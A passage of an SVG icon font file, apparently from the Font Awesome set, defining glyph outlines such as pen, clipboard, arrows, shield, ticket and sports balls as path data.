c4.7002 4.7002 12.2998 4.7002 17.0996 0l111 -111c4.7002 -4.7002 4.7002 -12.2998 0 -17l-262.6 -262.601l-121.5 -21.2998c-16.4004 -2.7998 -30.7002 11.4004 -27.7998 27.7998l21.1992 121.5zM124.1 108.1c5.5 -5.5 14.3008 -5.5 19.8008 0l154 154
c5.5 5.5 5.5 14.3008 0 19.8008s-14.3008 5.5 -19.8008 0l-154 -154c-5.5 -5.5 -5.5 -14.3008 0 -19.8008zM88 24v48h-36.2998l-11.2998 -64.5l31.0996 -31.0996l64.5 11.2998v36.2998h-48z" />
    <glyph glyph-name="pen" unicode="&#xf304;" 
d="M290.74 354.76l128.02 -128.02l-277.99 -277.99l-114.14 -12.5996c-15.2803 -1.69043 -28.1895 11.2295 -26.4902 26.5098l12.7002 114.22zM497.94 373.82c18.75 -18.75 18.75 -49.1504 0 -67.9102l-56.5508 -56.5498l-128.02 128.02l56.5498 56.5498
c18.75 18.75 49.1602 18.75 67.9102 0z" />
    <glyph glyph-name="pen-alt" unicode="&#xf305;" 
d="M497.94 373.83c18.75 -18.7598 18.75 -49.1602 0 -67.9102l-56.5508 -56.5498l-128.02 128.02l56.5498 56.5508c18.75 18.75 49.1602 18.75 67.9102 0zM251.14 394.36l84.8506 -84.8506l82.7695 -82.7695l-196.79 -196.79
c-44.8223 -44.8203 -132.335 -86.8428 -195.34 -93.7998c-15.2803 -1.69043 -28.1895 11.2295 -26.4902 26.5098l0.0302734 0.229492c7.00195 62.9189 49.0156 150.315 93.7803 195.08l151.56 151.55l-22.6299 22.6201l-101.82 -101.819
c-6.25 -6.25 -16.3799 -6.25 -22.6299 0l-22.6299 22.6299c-6.25 6.24023 -6.25 16.3701 0 22.6201l118.78 118.79c15.6201 15.6201 40.9395 15.6201 56.5596 0z" />
    <glyph glyph-name="long-arrow-alt-down" unicode="&#xf309;" horiz-adv-x="255" 
d="M168 102.059h46.0576c21.3828 0 32.0908 -25.8516 16.9717 -40.9707l-86.0596 -86.0586c-9.37207 -9.37305 -24.5674 -9.37305 -33.9404 0l-86.0596 86.0586c-15.1191 15.1201 -4.41113 40.9707 16.9717 40.9707h46.0586v301.941c0 6.62695 5.37305 12 12 12h56
c6.62695 0 12 -5.37305 12 -12v-301.941z" />
    <glyph glyph-name="long-arrow-alt-left" unicode="&#xf30a;" horiz-adv-x="448" 
d="M134.059 152v-46.0576c0 -21.3828 -25.8516 -32.0908 -40.9707 -16.9717l-86.0586 86.0596c-9.37305 9.37207 -9.37305 24.5674 0 33.9404l86.0586 86.0596c15.1201 15.1191 40.9707 4.41113 40.9707 -16.9717v-46.0586h301.941c6.62695 0 12 -5.37305 12 -12v-56
c0 -6.62695 -5.37305 -12 -12 -12h-301.941z" />
    <glyph glyph-name="long-arrow-alt-right" unicode="&#xf30b;" horiz-adv-x="448" 
d="M313.941 232v46.0576c0 21.3828 25.8516 32.0908 40.9707 16.9717l86.0586 -86.0596c9.37305 -9.37207 9.37305 -24.5674 0 -33.9404l-86.0586 -86.0596c-15.1201 -15.1191 -40.9707 -4.41113 -40.9707 16.9717v46.0586h-301.941c-6.62695 0 -12 5.37305 -12 12v56
c0 6.62695 5.37305 12 12 12h301.941z" />
    <glyph glyph-name="long-arrow-alt-up" unicode="&#xf30c;" horiz-adv-x="256" 
d="M88 281.941h-46.0576c-21.3828 0 -32.0908 25.8516 -16.9717 40.9707l86.0596 86.0586c9.37207 9.37305 24.5674 9.37305 33.9404 0l86.0596 -86.0586c15.1191 -15.1201 4.41113 -40.9707 -16.9717 -40.9707h-46.0586v-301.941c0 -6.62695 -5.37305 -12 -12 -12h-56
c-6.62695 0 -12 5.37305 -12 12v301.941z" />
    <glyph glyph-name="expand-arrows-alt" unicode="&#xf31e;" horiz-adv-x="448" 
d="M448.1 104v-112c0 -13.2998 -10.6992 -24 -24 -24h-112c-21.3994 0 -32.0996 25.9004 -17 41l36.2002 36.2002l-107.3 107.2l-107.2 -107.301l36.2002 -36.0996c15.0996 -15.0996 4.40039 -41 -17 -41h-112c-13.2998 0 -24 10.7002 -24 24v112
c0 21.4004 25.9004 32.0996 41 17l36.2002 -36.2002l107.3 107.2l-107.3 107.3l-36.2002 -36.2998c-15.0996 -15.0996 -41 -4.40039 -41 17v112c0 13.2998 10.7002 24 24 24h112c21.4004 0 32.0996 -25.9004 17 -41l-36.2002 -36.2002l107.2 -107.2l107.3 107.301
l-36.2002 36.0996c-15.0996 15.0996 -4.39941 41 17 41h112c13.3008 0 24 -10.7002 24 -24v-112c0 -21.4004 -25.8994 -32.0996 -41 -17l-36.1992 36.2002l-107.301 -107.2l107.301 -107.3l36.1992 36.2002c15.1006 15.1992 41 4.5 41 -16.9004z" />
    <glyph glyph-name="clipboard" unicode="&#xf328;" horiz-adv-x="384" 
d="M384 336v-352c0 -26.5098 -21.4902 -48 -48 -48h-288c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h80c0 35.29 28.71 64 64 64s64 -28.71 64 -64h80c26.5098 0 48 -21.4902 48 -48zM192 408c-13.2549 0 -24 -10.7451 -24 -24s10.7451 -24 24 -24
s24 10.7451 24 24s-10.7451 24 -24 24zM288 294v20c0 3.31152 -2.68848 6 -6 6h-180c-3.31152 0 -6 -2.68848 -6 -6v-20c0 -3.31152 2.68848 -6 6 -6h180c3.31152 0 6 2.68848 6 6z" />
    <glyph glyph-name="arrows-alt-h" unicode="&#xf337;" 
d="M377.941 278.059c0 21.3828 25.8516 32.0908 40.9707 16.9707l86.0586 -86.0596c9.37305 -9.37305 9.37305 -24.5674 0 -33.9404l-86.0586 -86.0596c-15.1201 -15.1191 -40.9707 -4.41113 -40.9707 16.9717v46.0586h-243.883v-46.0576
c0 -21.3828 -25.8516 -32.0908 -40.9707 -16.9717l-86.0586 86.0596c-9.37305 9.37305 -9.37305 24.5674 0 33.9404l86.0586 86.0596c15.1201 15.1191 40.9707 4.41113 40.9707 -16.9717v-46.0586h243.883v46.0586z" />
    <glyph glyph-name="arrows-alt-v" unicode="&#xf338;" horiz-adv-x="256" 
d="M214.059 70.0586c21.3828 0 32.0908 -25.8516 16.9707 -40.9707l-86.0596 -86.0586c-9.37305 -9.37305 -24.5674 -9.37305 -33.9404 0l-86.0596 86.0586c-15.1191 15.1201 -4.41113 40.9707 16.9717 40.9707h46.0586v243.883h-46.0576
c-21.3828 0 -32.0908 25.8516 -16.9717 40.9707l86.0596 86.0586c9.37305 9.37305 24.5674 9.37305 33.9404 0l86.0596 -86.0586c15.1191 -15.1201 4.41113 -40.9707 -16.9717 -40.9707h-46.0586v-243.883h46.0586z" />
    <glyph glyph-name="arrow-alt-circle-down" unicode="&#xf358;" 
d="M504 192c0 -137 -111 -248 -248 -248s-248 111 -248 248s111 248 248 248s248 -111 248 -248zM212 308v-116h-70.9004c-10.6992 0 -16.0996 -13 -8.5 -20.5l114.9 -114.3c4.7002 -4.7002 12.2002 -4.7002 16.9004 0l114.899 114.3c7.60059 7.59961 2.2002 20.5 -8.5 20.5
h-70.7998v116c0 6.59961 -5.40039 12 -12 12h-64c-6.59961 0 -12 -5.40039 -12 -12z" />
    <glyph glyph-name="arrow-alt-circle-left" unicode="&#xf359;" 
d="M256 -56c-137 0 -248 111 -248 248s111 248 248 248s248 -111 248 -248s-111 -248 -248 -248zM372 236h-116v70.9004c0 10.6992 -13 16.0996 -20.5 8.5l-114.3 -114.9c-4.7002 -4.7002 -4.7002 -12.2002 0 -16.9004l114.3 -114.899
c7.59961 -7.60059 20.5 -2.2002 20.5 8.5v70.7998h116c6.59961 0 12 5.40039 12 12v64c0 6.59961 -5.40039 12 -12 12z" />
    <glyph glyph-name="arrow-alt-circle-right" unicode="&#xf35a;" 
d="M256 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM140 148h116v-70.9004c0 -10.6992 13 -16.0996 20.5 -8.5l114.3 114.9c4.7002 4.7002 4.7002 12.2002 0 16.9004l-114.3 115c-7.59961 7.59961 -20.5 2.19922 -20.5 -8.5
v-70.9004h-116c-6.59961 0 -12 -5.40039 -12 -12v-64c0 -6.59961 5.40039 -12 12 -12z" />
    <glyph glyph-name="arrow-alt-circle-up" unicode="&#xf35b;" 
d="M8 192c0 137 111 248 248 248s248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248zM300 76v116h70.9004c10.6992 0 16.0996 13 8.5 20.5l-114.9 114.3c-4.7002 4.7002 -12.2002 4.7002 -16.9004 0l-115 -114.3c-7.59961 -7.59961 -2.19922 -20.5 8.5 -20.5
h70.9004v-116c0 -6.59961 5.40039 -12 12 -12h64c6.59961 0 12 5.40039 12 12z" />
    <glyph glyph-name="external-link-alt" unicode="&#xf35d;" horiz-adv-x="576" 
d="M576 424v-127.984c0 -21.4609 -25.96 -31.9795 -40.9707 -16.9707l-35.707 35.709l-243.523 -243.522c-9.37305 -9.37305 -24.5674 -9.37305 -33.9404 0l-22.627 22.627c-9.37305 9.37305 -9.37305 24.5684 0 33.9404l243.524 243.525l-35.7031 35.7051
c-15.0703 15.0703 -4.39648 40.9707 16.9717 40.9707h127.976c13.2549 0 24 -10.7451 24 -24zM407.029 177.206c15.1191 15.1201 40.9707 4.41211 40.9707 -16.9697v-176.236c0 -26.5098 -21.4902 -48 -48 -48h-352c-26.5098 0 -48 21.4902 -48 48v352
c0 26.5098 21.4902 48 48 48h296c21.3809 0 32.0889 -25.8506 16.9697 -40.9707l-16 -16c-3.87988 -3.87988 -11.4824 -7.0293 -16.9697 -7.0293h-264v-320h320v144.235v0.000976562c0 5.4873 3.14941 13.0898 7.0293 16.9697z" />
    <glyph glyph-name="external-link-square-alt" unicode="&#xf360;" horiz-adv-x="448" 
d="M448 368v-352c0 -26.5098 -21.4902 -48 -48 -48h-352c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h352c26.5098 0 48 -21.4902 48 -48zM360 352h-111.971c-21.3135 0 -32.0801 -25.8613 -16.9717 -40.9707l31.9844 -31.9873l-195.527 -195.527
c-4.68555 -4.68555 -4.68555 -12.2832 0 -16.9707l31.0293 -31.0293c4.6875 -4.68555 12.2852 -4.68555 16.9707 0l195.526 195.526l31.9883 -31.9912c15.0283 -15.0264 40.9707 -4.47461 40.9707 16.9717v111.979c0 13.2549 -10.7451 24 -24 24z" />
    <glyph glyph-name="exchange-alt" unicode="&#xf362;" 
d="M0 280v16c0 13.2549 10.7451 24 24 24h360v48c0 21.3672 25.8994 32.042 40.9707 16.9707l80 -80c9.37207 -9.37305 9.37207 -24.5684 0 -33.9404l-80 -80c-15.0146 -15.0127 -40.9707 -4.48633 -40.9707 16.9697v48h-360c-13.2549 0 -24 10.7451 -24 24zM488 128
c13.2549 0 24 -10.7451 24 -24v-16c0 -13.2549 -10.7451 -24 -24 -24h-360v-48c0 -21.4365 -25.9434 -31.9971 -40.9707 -16.9697l-80 80c-9.37207 9.37207 -9.37207 24.5674 0 33.9404l80 80c15.1084 15.1094 40.9707 4.34375 40.9707 -16.9707v-48h360z" />
    <glyph glyph-name="cloud-download-alt" unicode="&#xf381;" horiz-adv-x="640" 
d="M537.6 221.4c58.4004 -11.8008 102.4 -63.5 102.4 -125.4c0 -70.7002 -57.2998 -128 -128 -128h-368c-79.5 0 -144 64.5 -144 144c0 62.7998 40.2002 116.2 96.2002 135.9c-0.100586 2.69922 -0.200195 5.39941 -0.200195 8.09961c0 88.4004 71.5996 160 160 160
c59.2998 0 111 -32.2002 138.7 -80.2002c15.2002 10.2002 33.5996 16.2002 53.2998 16.2002c53 0 96 -43 96 -96c0 -12.2002 -2.2998 -23.9004 -6.40039 -34.5996zM404.7 132.7c10.0996 10.0996 2.89941 27.2998 -11.2998 27.2998h-65.4004v112c0 8.7998 -7.2002 16 -16 16
h-48c-8.7998 0 -16 -7.2002 -16 -16v-112h-65.4004c-14.1992 0 -21.3994 -17.2002 -11.2998 -27.2998l105.4 -105.4c6.2002 -6.2002 16.3994 -6.2002 22.5996 0z" />
    <glyph glyph-name="cloud-upload-alt" unicode="&#xf382;" horiz-adv-x="640" 
d="M537.6 221.4c58.4004 -11.8008 102.4 -63.5 102.4 -125.4c0 -70.7002 -57.2998 -128 -128 -128h-368c-79.5 0 -144 64.5 -144 144c0 62.7998 40.2002 116.2 96.2002 135.9c-0.100586 2.69922 -0.200195 5.39941 -0.200195 8.09961c0 88.4004 71.5996 160 160 160
c59.2998 0 111 -32.2002 138.7 -80.2002c15.2002 10.2002 33.5996 16.2002 53.2998 16.2002c53 0 96 -43 96 -96c0 -12.2002 -2.2998 -23.9004 -6.40039 -34.5996zM393.4 160c14.1992 0 21.3994 17.2002 11.2998 27.2998l-105.4 105.4
c-6.2002 6.2002 -16.3994 6.2002 -22.5996 0l-105.4 -105.4c-10.0996 -10.0996 -3 -27.2998 11.2998 -27.2998h65.4004v-112c0 -8.7998 7.2002 -16 16 -16h48c8.7998 0 16 7.2002 16 16v112h65.4004z" />
    <glyph glyph-name="gem" unicode="&#xf3a5;" horiz-adv-x="576" 
d="M485.5 448l90.5 -160h-101.1l-69.2002 160h79.7998zM357.5 448l69.2002 -160h-277.4l69.2002 160h139zM90.5 448h79.7998l-69.2002 -160h-101.1zM0 256h100.7l123 -251.7c1.5 -3.09961 -2.7002 -5.89941 -5 -3.2998zM148.2 256h279.6l-137 -318.2
c-1 -2.39941 -4.5 -2.39941 -5.5 0zM352.3 4.2998l123 251.7h100.7l-218.7 -254.9c-2.2998 -2.69922 -6.5 0.100586 -5 3.2002z" />
    <glyph glyph-name="level-down-alt" unicode="&#xf3be;" horiz-adv-x="320" 
d="M313.553 55.6689l-103.966 -112.003c-9.48535 -10.2139 -25.6758 -10.2295 -35.1738 0l-103.975 112.003c-14.2061 15.2998 -3.37695 40.3311 17.5869 40.3311h63.9746v272h-83.9756h-0.00195312c-2.74316 0 -6.54395 1.5752 -8.4834 3.51465l-56 56
c-7.56055 7.55957 -2.20605 20.4854 8.48535 20.4854h195.976c13.2549 0 24 -10.7451 24 -24v-328h63.9658c20.8779 0 31.8516 -24.9688 17.5869 -40.3311z" />
    <glyph glyph-name="level-up-alt" unicode="&#xf3bf;" horiz-adv-x="320" 
d="M313.553 328.331c14.2646 -15.3623 3.29102 -40.3311 -17.5869 -40.3311h-63.9658v-328c0 -13.2549 -10.7451 -24 -24 -24h-195.976c-10.6914 0 -16.0459 12.9258 -8.48535 20.4854l56 56c1.93945 1.93945 5.74023 3.51465 8.4834 3.51465h0.00195312h83.9756v272
h-63.9746c-20.9639 0 -31.793 25.0312 -17.5869 40.3311l103.975 112.003c9.49805 10.2295 25.6885 10.2139 35.1738 0z" />
    <glyph glyph-name="lock-open" unicode="&#xf3c1;" horiz-adv-x="576" 
d="M423.5 448c84 0.299805 152.5 -68 152.5 -152v-80c0 -13.2998 -10.7002 -24 -24 -24h-32c-13.2998 0 -24 10.7002 -24 24v80c0 39.9004 -32.7002 72.4004 -72.7002 72c-39.5996 -0.400391 -71.2998 -33.2998 -71.2998 -72.9004v-71.0996h48c26.5 0 48 -21.5 48 -48v-192
c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v192c0 26.5 21.5 48 48 48h224v70.5c0 84 67.5 153.2 151.5 153.5z" />
    <glyph glyph-name="map-marker-alt" unicode="&#xf3c5;" horiz-adv-x="384" 
d="M172.268 -53.6699c-145.298 210.639 -172.268 232.257 -172.268 309.67c0 106.039 85.9609 192 192 192s192 -85.9609 192 -192c0 -77.4131 -26.9697 -99.0312 -172.268 -309.67c-9.53516 -13.7744 -29.9307 -13.7734 -39.4648 0zM192 176c44.1826 0 80 35.8174 80 80
s-35.8174 80 -80 80s-80 -35.8174 -80 -80s35.8174 -80 80 -80z" />
    <glyph glyph-name="microphone-alt" unicode="&#xf3c9;" horiz-adv-x="352" 
d="M336 256c8.83984 0 16 -7.16016 16 -16v-48c0 -88.9004 -66.29 -162.47 -152 -174.23v-33.7695h56c8.83984 0 16 -7.16016 16 -16v-16c0 -8.83984 -7.16016 -16 -16 -16h-160c-8.83984 0 -16 7.16016 -16 16v16c0 8.83984 7.16016 16 16 16h56v34.1504
c-88.0303 12.1396 -152 92.0498 -152 181.689v40.1602c0 8.83984 7.16016 16 16 16h16c8.83984 0 16 -7.16016 16 -16v-42.2998c0 -66.8105 48.71 -126.59 115.21 -133.08c76.2998 -7.44043 140.79 52.5801 140.79 127.38v48c0 8.83984 7.16016 16 16 16h16zM176 96
c-53.0195 0 -96 42.9805 -96 96v160c0 53.0195 42.9805 96 96 96s96 -42.9805 96 -96h-85.3301c-5.88965 0 -10.6699 -3.58008 -10.6699 -8v-16c0 -4.41992 4.78027 -8 10.6699 -8h85.3301v-32h-85.3301c-5.88965 0 -10.6699 -3.58008 -10.6699 -8v-16
c0 -4.41992 4.78027 -8 10.6699 -8h85.3301v-32h-85.3301c-5.88965 0 -10.6699 -3.58008 -10.6699 -8v-16c0 -4.41992 4.78027 -8 10.6699 -8h85.3301c0 -53.0195 -42.9805 -96 -96 -96z" />
    <glyph glyph-name="mobile-alt" unicode="&#xf3cd;" horiz-adv-x="320" 
d="M272 448c26.5 0 48 -21.5 48 -48v-416c0 -26.5 -21.5 -48 -48 -48h-224c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48h224zM160 -32c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32zM272 76v312
c0 6.59961 -5.40039 12 -12 12h-200c-6.59961 0 -12 -5.40039 -12 -12v-312c0 -6.59961 5.40039 -12 12 -12h200c6.59961 0 12 5.40039 12 12z" />
    <glyph glyph-name="money-bill-alt" unicode="&#xf3d1;" horiz-adv-x="640" 
d="M352 160c4.41992 0 8 -3.58008 8 -8v-16c0 -4.41992 -3.58008 -8 -8 -8h-64c-4.41992 0 -8 3.58008 -8 8v16c0 4.41992 3.58008 8 8 8h16v55.4404l-0.469727 -0.310547c-1.1123 -0.741211 -3.09961 -1.34375 -4.43652 -1.34375
c-2.36328 0 -5.34375 1.59668 -6.65332 3.56348l-8.88086 13.3105c-0.741211 1.1123 -1.34375 3.09961 -1.34375 4.43555c0 2.36328 1.59668 5.34473 3.56445 6.6543l15.3301 10.2197c3.93945 2.62988 8.56934 4.03027 13.3096 4.03027h13.5801c4.41992 0 8 -3.58008 8 -8
v-88h16zM608 384c17.6699 0 32 -14.3301 32 -32v-320c0 -17.6699 -14.3301 -32 -32 -32h-576c-17.6699 0 -32 14.3301 -32 32v320c0 17.6699 14.3301 32 32 32h576zM48 48h64c0 35.3496 -28.6504 64 -64 64v-64zM48 272c35.3496 0 64 28.6504 64 64h-64v-64zM320 80
c53 0 96 50.1299 96 112c0 61.8604 -42.9805 112 -96 112s-96 -50.1396 -96 -112c0 -61.8496 42.9805 -112 96 -112zM592 48v64c-35.3496 0 -64 -28.6504 -64 -64h64zM592 272v64h-64c0 -35.3496 28.6504 -64 64 -64z" />
    <glyph glyph-name="phone-slash" unicode="&#xf3dd;" horiz-adv-x="640" 
d="M268.2 66.5996c11.5 5.40039 22.7002 11.6006 33.5996 18.1006l80 -61.7998c-76 -54.5 -169 -86.9004 -269.7 -86.9004c-11.2998 0 -20.8994 7.7998 -23.3994 18.5996l-24 104c-2.60059 11.4004 3.2002 22.9004 13.8994 27.5l112 48
c9.80078 4.2002 21.2002 1.40039 28 -6.89941zM633.8 -10.0996c7 -5.40039 8.2998 -15.5 2.90039 -22.3008l-19.6006 -25.2998c-5.5 -7 -15.5 -8.2002 -22.5 -2.7998l-588.399 454.7c-7 5.39941 -8.2002 15.3994 -2.7998 22.3994l19.5996 25.2002
c5.5 7 15.5 8.2002 22.5 2.7998l353.9 -273.5c18.0996 22.5 33.7998 46.7002 46 72.8008l-60.6006 49.5996c-8.2998 6.7002 -11.0996 18.2002 -6.89941 28l48 112c4.59961 10.5996 16.1992 16.5 27.5 13.9004l104 -24c10.8994 -2.5 18.5996 -12.2002 18.5996 -23.4004
c0 -108.9 -38.0996 -208.4 -100.9 -287.5z" />
    <glyph glyph-name="portrait" unicode="&#xf3e0;" horiz-adv-x="384" 
d="M336 448c26.5 0 48 -21.5 48 -48v-416c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48h288zM192 320c-35.2998 0 -64 -28.7002 -64 -64s28.7002 -64 64 -64s64 28.7002 64 64s-28.7002 64 -64 64zM304 83.2002v19.2002
c0 31.7998 -30.0996 57.5996 -67.2002 57.5996h-5c-12.2002 -5.09961 -25.7002 -8 -39.7998 -8s-27.5 2.90039 -39.7998 8h-5c-37.1006 0 -67.2002 -25.7998 -67.2002 -57.5996v-19.2002c0 -10.6006 10 -19.2002 22.4004 -19.2002h179.199
c12.4004 0 22.4004 8.59961 22.4004 19.2002z" />
    <glyph glyph-name="reply" unicode="&#xf3e5;" 
d="M8.30859 258.164l176.005 151.985c15.4053 13.3047 39.6865 2.50391 39.6865 -18.1641v-80.0537c160.629 -1.83887 288 -34.0312 288 -186.258c0 -61.4404 -39.5811 -122.309 -83.333 -154.132c-13.6533 -9.93066 -33.1113 2.5332 -28.0771 18.6309
c45.3438 145.012 -21.5068 183.51 -176.59 185.742v-87.915c0 -20.7002 -24.2998 -31.4531 -39.6865 -18.1641l-176.005 152c-11.0703 9.5625 -11.0859 26.7529 0 36.3281z" />
    <glyph glyph-name="shield-alt" unicode="&#xf3ed;" 
d="M466.5 364.3c17.7998 -7.39941 29.5 -24.8994 29.5 -44.2998c0 -221.3 -135.9 -344.6 -221.6 -380.3c-11.8008 -4.90039 -25.1006 -4.90039 -36.9004 0c-107 44.5996 -221.5 181.8 -221.5 380.3c0 19.4004 11.7002 36.9004 29.5996 44.2998l192 80
c4.89062 2.0293 13.1562 3.6748 18.4502 3.6748c5.29492 0 13.5596 -1.64551 18.4502 -3.6748zM256.1 1.7002c93.7002 46.5996 172.5 156.3 175.801 307.7l-175.9 73.2998z" />
    <glyph glyph-name="tablet-alt" unicode="&#xf3fa;" horiz-adv-x="448" 
d="M400 448c26.5 0 48 -21.5 48 -48v-416c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48h352zM224 -32c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32zM400 76v312
c0 6.59961 -5.40039 12 -12 12h-328c-6.59961 0 -12 -5.40039 -12 -12v-312c0 -6.59961 5.40039 -12 12 -12h328c6.59961 0 12 5.40039 12 12z" />
    <glyph glyph-name="tachometer-alt" unicode="&#xf3fd;" horiz-adv-x="576" 
d="M288 416c159.06 0 288 -128.94 288 -288c0 -52.7998 -14.25 -102.26 -39.0596 -144.8c-5.61035 -9.62012 -16.3008 -15.2002 -27.4404 -15.2002h-443c-11.1396 0 -21.8301 5.58008 -27.4404 15.2002c-24.8096 42.54 -39.0596 92 -39.0596 144.8
c0 159.06 128.94 288 288 288zM288 352c-17.6699 0 -31.9902 -14.3301 -31.9902 -32s14.3301 -32 32 -32c6.66992 0 12.5098 2.51953 17.6406 6.00977l9.21973 27.6699c0.80957 2.44043 2.33984 4.41016 3.4502 6.66992c-3.74023 13.5205 -15.6104 23.6504 -30.3203 23.6504
zM96 64c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM144 224c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM390.77 296.41c4.18066 12.5703 -2.59961 26.1699 -15.1699 30.3594
c-12.6299 4.28027 -26.1895 -2.60938 -30.3594 -15.1699l-61.3398 -184.01c-33.4004 -2.16016 -59.9004 -29.6494 -59.9004 -63.5898c0 -11.7197 3.37988 -22.5498 8.87988 -32h110.24c5.5 9.4502 8.87988 20.2803 8.87988 32c0 19.46 -8.87012 36.6699 -22.5596 48.4102z
M405.43 239.21c5.68066 -8.94043 15.1904 -15.21 26.5703 -15.2197c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32c-3.91992 0 -7.58008 -0.94043 -11.0498 -2.23047zM480 64c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32z
" />
    <glyph glyph-name="ticket-alt" unicode="&#xf3ff;" horiz-adv-x="576" 
d="M128 288h320v-192h-320v192zM528 192c0 -26.5098 21.4902 -48 48 -48v-96c0 -26.5098 -21.4902 -48 -48 -48h-480c-26.5098 0 -48 21.4902 -48 48v96c26.5098 0 48 21.4902 48 48s-21.4902 48 -48 48v96c0 26.5098 21.4902 48 48 48h480c26.5098 0 48 -21.4902 48 -48
v-96c-26.5098 0 -48 -21.4902 -48 -48zM480 296c0 13.2549 -10.7451 24 -24 24h-336c-13.2549 0 -24 -10.7451 -24 -24v-208c0 -13.2549 10.7451 -24 24 -24h336c13.2549 0 24 10.7451 24 24v208z" />
    <glyph glyph-name="user-alt" unicode="&#xf406;" 
d="M256 160c-79.5 0 -144 64.5 -144 144s64.5 144 144 144s144 -64.5 144 -144s-64.5 -144 -144 -144zM384 128c70.7002 0 128 -57.2998 128 -128v-16c0 -26.5 -21.5 -48 -48 -48h-416c-26.5 0 -48 21.5 -48 48v16c0 70.7002 57.2998 128 128 128h55.0996
c22.3008 -10.2002 46.9004 -16 72.9004 -16s50.7002 5.7998 72.9004 16h55.0996z" />
    <glyph glyph-name="window-close" unicode="&#xf410;" 
d="M464 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-416c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h416zM380.4 125.5l-67.1006 66.5l67.1006 66.5c4.7998 4.7998 4.7998 12.5996 0 17.4004l-40.5 40.5
c-4.80078 4.7998 -12.6006 4.7998 -17.4004 0l-66.5 -67.1006l-66.5 67.1006c-4.7998 4.7998 -12.5996 4.7998 -17.4004 0l-40.5 -40.5c-4.7998 -4.80078 -4.7998 -12.6006 0 -17.4004l67.1006 -66.5l-67.1006 -66.5c-4.7998 -4.7998 -4.7998 -12.5996 0 -17.4004
l40.5 -40.5c4.80078 -4.7998 12.6006 -4.7998 17.4004 0l66.5 67.1006l66.5 -67.1006c4.7998 -4.7998 12.5996 -4.7998 17.4004 0l40.5 40.5c4.7998 4.80078 4.7998 12.6006 0 17.4004z" />
    <glyph glyph-name="baseball-ball" unicode="&#xf433;" horiz-adv-x="495" 
d="M368.5 84.0996c12.9004 -26.6992 30.2998 -50.1992 51.4004 -70.5996c-44.6006 -43 -105.101 -69.5 -171.9 -69.5c-66.9004 0 -127.5 26.5996 -172 69.7002c21.2002 20.3994 38.5996 44 51.5 70.7002l-28.7998 13.8994c-11.1006 -23 -26.1006 -43.2998 -44.2998 -61
c-34 42.4004 -54.4004 96.1006 -54.4004 154.7s20.4004 112.3 54.4004 154.8c17.7998 -17.2998 32.5 -37.0996 43.5 -59.3994l28.6992 14.0996c-12.7998 25.9004 -30 48.9004 -50.6992 68.7998c44.5996 43.1006 105.199 69.7002 172.1 69.7002
c67 0 127.6 -26.7002 172.2 -69.7998c-20.7998 -20 -38 -43 -50.7998 -69l28.6992 -14.1006c11 22.4004 25.8008 42.2002 43.6006 59.5c33.7998 -42.3994 54.2002 -96.0996 54.2002 -154.6c0 -58.5996 -20.5 -112.4 -54.5 -154.9c-18.1006 17.7002 -33 38 -44.1006 60.9004z
M140.2 116.1c17.2998 53.9004 14.2998 108.2 -0.700195 153.801l-30.4004 -10c13.3008 -40.2002 15.5 -87.6006 0.600586 -134zM356.5 269.5c-15 -45.5 -18 -99.7998 -0.700195 -153.8l30.5 9.7998c-14.8994 46.5 -12.5996 93.9004 0.600586 134z" />
    <glyph glyph-name="basketball-ball" unicode="&#xf434;" horiz-adv-x="496" 
d="M212.3 437.7c-1.5 -50 -17 -95.4004 -44.7998 -131.2l-77.4004 77.4004c36 29.6992 78.4004 47.5 122.2 53.7998zM248 226l-46.2998 46.2998c37.2002 45.4004 57.5 103.8 58.7002 167.7c51.8994 -2.59961 103.1 -21.0996 145.5 -56.0996zM56.0996 349.9l77.4004 -77.4004
c-35.7002 -27.7998 -81.2002 -43.2998 -131.2 -44.7998c6.2998 43.7998 24.1006 86.2002 53.7998 122.2zM328.3 145.7l-46.2998 46.2998l157.9 157.9c35 -42.4004 53.5 -93.6006 56.0996 -145.5c-64 -1.30078 -122.4 -21.6006 -167.7 -58.7002zM248 158l46.2998 -46.2998
c-37.0996 -45.2998 -57.3994 -103.7 -58.7002 -167.7c-51.8994 2.59961 -103.1 21.2002 -145.5 56.0996zM439.9 34.0996l-77.4004 77.4004c35.7002 27.7002 81.0996 43.2002 131.2 44.7998c-6.2998 -43.7998 -24.1006 -86.2002 -53.7998 -122.2zM167.7 238.3
l46.2998 -46.2998l-157.9 -157.9c-35 42.4004 -53.5 93.6006 -56.0996 145.5c63.9004 1.10059 122.3 21.5 167.7 58.7002zM283.7 -53.7002c1.59961 50 17.0996 95.5 44.7998 131.2l77.4004 -77.4004c-36 -29.6992 -78.4004 -47.5 -122.2 -53.7998z" />
    <glyph glyph-name="bowling-ball" unicode="&#xf436;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM120 256c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32zM184 352c0 -17.7002 14.2998 -32 32 -32s32 14.2998 32 32
s-14.2998 32 -32 32s-32 -14.2998 -32 -32zM232 208c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32z" />
